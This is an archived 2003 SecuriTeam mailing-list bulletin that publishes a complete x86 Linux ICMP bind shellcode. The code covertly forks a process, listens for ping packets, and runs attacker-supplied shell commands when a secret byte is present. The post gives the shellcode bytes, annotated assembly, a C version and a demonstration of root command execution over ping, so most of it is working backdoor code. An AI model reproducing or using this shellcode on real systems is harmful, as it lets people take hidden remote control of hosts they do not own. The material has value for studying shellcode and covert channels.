[TOOL] Linux ICMP Based Shellcode
From: support@securiteam.com
Date: 02/05/03
- Previous message: support@securiteam.com: "[REVS] File Stream Overflows Paper"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 5 Feb 2003 20:03:28 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Linux ICMP Based Shellcode
------------------------------------------------------------------------
DETAILS
The following is a 137-byte Linux shellcode that creates a remote ICMP
backdoor that can be controlled trough the ping utility.
Shellcode:
/*
x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org
[example]
main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
Size of shellcode = 137
main:/home/gloomy/security/shellcode/linux/icmp# ping -p
992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
main:/home/gloomy/security/shellcode/linux/icmp# cat out
uid=0(root) gid=0(root) groups=0(root)
main:/home/gloomy/security/shellcode/linux/icmp#
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define SECRET_CHAR "\x99"
char shell[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
"\x43\x41\x51\xb1\x03\x51\x49\x51"
"\x89\xe1\xcd\x80\x89\xc2\xb0\x02"
"\xcd\x80\x31\xdb\x39\xc3\x75\x55"
"\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
"\xff\x54\x54\x53\x50\x55\x52\x89"
"\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
"\xe9\x01\xc1\x31\xc0\x88\x41\xfe"
"\xb0\x25\x01\xc5\xb0" SECRET_CHAR
"\x32\x45\xff\x75\xd5\xb0\x02\xcd"
"\x80\x31\xdb\x39\xc3\x74\x25\xeb"
"\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
"\x06\xcd\x80\x5b\x89\xd9\x88\x43"
"\x07\x80\xc1\x08\x50\x55\x51\x53"
"\x89\xe1\x99\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xcd\x80\xe8\xd8\xff\xff"
"\xff"
"/bin/sh -c";
void asm_code() {
__asm("
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x66,%al
incl %ebx
incl %ecx
push %ecx
movb $0x3,%cl
push %ecx
decl %ecx
push %ecx
movl %esp,%ecx
int $0x80 /* socket(); */
movl %eax,%edx
movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
jne exit
endlessloop:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x10,%al
push %eax
movb $0xff,%al
push %esp
push %esp
push %ebx
push %eax
push %ebp
push %edx
movl %esp,%ecx
movb $0x66,%al
movb $0x0c,%bl
int $0x80 /* recvfrom(); */
movl %ebp,%ecx
addl %eax,%ecx
xorl %eax,%eax
movb %al,-2(%ecx)
movb $0x25,%al
addl %eax,%ebp
movb $0x99,%al /* SECRET_CHAR */
xorb -1(%ebp),%al
jnz endlessloop
movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
je stack
jmp endlessloop
execve:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x2,%bl
movb $0x6,%al
int $0x80 /* close(); */
pop %ebx
movl %ebx,%ecx
movb %al,0x7(%ebx)
addb $0x8,%cl
push %eax
push %ebp
push %ecx
push %ebx
movl %esp,%ecx
cdq
movb $0xb,%al
int $0x80 /* execve(); */
exit:
xorl %eax,%eax
incl %eax
int $0x80 /* exit(); */
stack:
call execve
.string \"/bin/sh -c\"
");
}
void c_code() {
int fd;
int nb = 0;
struct sockaddr_in them;
int them_size = sizeof(struct sockaddr);
char buf[256];
char *prog[] = {"/bin/sh","-c",&buf[37],NULL};
fd = socket(2,3,1);
if (fork() > 0) exit(0);
while (1) {
while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr
*)&them,&them_size)));
buf[nb-1] = 0;
if (buf[36] == (char)SECRET_CHAR)
if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
}
}
int main(int c,char *v[]) {
void (*i)();
i = (void (*)())shell;
fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));
i();
return 0;
}
ADDITIONAL INFORMATION
The shellcode has been provided by <mailto:gloomy@netric.org> Gloomy.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[NT] Banner Buffer Overflows Found in Multiple FTP Clients"
- Previous message: support@securiteam.com: "[REVS] File Stream Overflows Paper"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
